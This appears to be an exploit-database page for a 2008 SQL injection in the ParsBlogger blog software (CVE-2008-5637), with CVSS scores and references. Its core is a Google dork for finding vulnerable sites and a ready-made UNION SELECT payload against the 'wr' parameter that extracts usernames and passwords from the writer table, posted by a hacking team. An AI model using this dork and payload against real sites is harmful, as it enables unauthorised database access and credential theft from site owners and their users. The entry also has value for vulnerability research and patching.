ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability

2008.12.21
Credit: BorN To K!LL
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-5637
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------------------------------------------------------------------------- [~] Script : ParsBlogger [~] Version : >!< [~] Link : http://www.parsblogger.com [~] Dork : "Powered by ParsBlogger" [~] Author : BorN To K!LL [~] TeaM : Security Geeks [ Sec-Geeks.com ] -------------------------------------------------------------------------------------------------------------------- [~] Exploit :. site.ir/blog.asp?wr=[SQL] [~] Example :. site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer-- -------------------------------------------------------------------------------------------------------------------- [~] Greetings :. [ &#65533;r &#166;&#187;C&#208;&#65533;&#163;&#65533; ] , [ SECURITY G&#163;&#163;KS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims --------------------------------------------------------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/32488
http://www.milw0rm.com/exploits/7239
http://www.frsirt.com/english/advisories/2008/3270


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top